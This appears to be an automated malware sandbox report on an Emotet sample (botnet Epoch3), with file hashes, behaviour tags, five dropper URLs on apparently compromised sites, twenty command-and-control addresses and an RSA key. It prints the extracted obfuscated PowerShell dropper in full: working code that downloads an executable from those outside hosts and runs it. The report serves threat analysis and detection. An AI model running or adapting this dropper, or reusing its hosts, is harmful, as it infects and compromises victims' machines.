General

  • Target

    Docs_7f6f469f6981d4a92806d0d3b706e258.47

  • Size

    127KB

  • Sample

    191216-kj834shtp2

  • MD5

    7f6f469f6981d4a92806d0d3b706e258

  • SHA1

    b62ce47650a8cad8dc922fdf54db41e5c2fc0b4c

  • SHA256

    0dfb26cd2eb02c921a9c73c9c5615dfb666cdd33971639d6441eb6893ae2efe1

  • SHA512

    96ab1419ab38bc0958ab7d0d130efda8302f3f07555753882d28ca19fd0f73a5f781fdf617a741503b8b858dec1d182b08c880c48c5875e672462880b600a8bd

Malware Config

Extracted

Language
ps1
Source
$Oqojrpmkdzlg='Geusckfeislh';$Sgynadtdzi = '218';$Fsncjfbnouvcw='Vrtgwojhgrqk';$Isveftscymko=$env:userprofile+'\'+$Sgynadtdzi+'.exe';$Ykjzmxgyekpf='Xhhivpxtn';$Pdzvevbhes=.('new-obj'+'e'+'ct') nEt.WebcLiEnT;$Mvcblrhkzozg='https://lilikhendarwati.com/wp-admin/JbdTQoQQ/*http://www.zhangboo.com/wp-admin/lwhcvV/*http://test.windsorheatingandair.com/wp-includes/r9lv-4teq5ff-8759846140/*https://www.jackiejill.com/wp-includes/yiqr4r6a-dwt7s0u-26965878/*http://apolina.pl/engl/1tuh6ul-gakf89-994/'."s`pLIT"('*');$Jvkhktvtsqj='Klmwnirr';foreach($Mzmqbzjug in $Mvcblrhkzozg){try{$Pdzvevbhes."do`Wnl`OAdfILE"($Mzmqbzjug, $Isveftscymko);$Kykhosxe='Jccvrurtmy';If ((&('Get-'+'I'+'tem') $Isveftscymko)."lEn`Gth" -ge 31454) {[Diagnostics.Process]::"STa`RT"($Isveftscymko);$Dykdageiykrai='Gaulnathjq';break;$Rxfapwcgiepw='Clskviufmldd'}}catch{}}$Kramunnkskce='Dblxnvyhpyvx'
URLs

  • exe.dropper: https://lilikhendarwati.com/wp-admin/JbdTQoQQ/

  • exe.dropper: http://www.zhangboo.com/wp-admin/lwhcvV/

  • exe.dropper: http://test.windsorheatingandair.com/wp-includes/r9lv-4teq5ff-8759846140/

  • exe.dropper: https://www.jackiejill.com/wp-includes/yiqr4r6a-dwt7s0u-26965878/

  • exe.dropper: http://apolina.pl/engl/1tuh6ul-gakf89-994/

Extracted

Family

emotet

Botnet

Epoch3

C2

190.38.252.45:443

105.225.77.21:80

181.167.35.84:80

164.68.115.146:8080

5.189.148.98:8080

46.105.128.215:8080

69.30.205.162:7080

190.161.67.63:80

81.82.247.216:80

72.69.99.47:80

172.90.70.168:443

91.117.31.181:80

200.71.112.158:53

51.77.113.97:8080

190.101.87.170:80

96.234.38.186:8080

190.146.14.143:443

86.70.224.211:80

88.247.26.78:80

175.103.239.50:80

rsa_pubkey.plain
-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAMqZMACZDzcRXuSnj2OI8LeIYKrbUIXL
faUgIJPwYd305HnaBS2AfA0R+oPxT32r+3BbayI3KguqAn3E+rbwtLhqhOXOlTnY
7yvG4ufmwCCkRzc6Sq8baToxmd6y523AIQIDAQAB
-----END PUBLIC KEY-----

Targets

    • Target

      Docs_7f6f469f6981d4a92806d0d3b706e258.47

    • Size

      127KB

    • MD5

      7f6f469f6981d4a92806d0d3b706e258

    • SHA1

      b62ce47650a8cad8dc922fdf54db41e5c2fc0b4c

    • SHA256

      0dfb26cd2eb02c921a9c73c9c5615dfb666cdd33971639d6441eb6893ae2efe1

    • SHA512

      96ab1419ab38bc0958ab7d0d130efda8302f3f07555753882d28ca19fd0f73a5f781fdf617a741503b8b858dec1d182b08c880c48c5875e672462880b600a8bd

    • Emotet

      Emotet is a trojan that is primarily spread through spam emails.

    • Executes dropped EXE

    • Windows security modification

    • Checks system information in the registry

      System information is often read in order to detect sandboxing environments.

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v6

Tasks
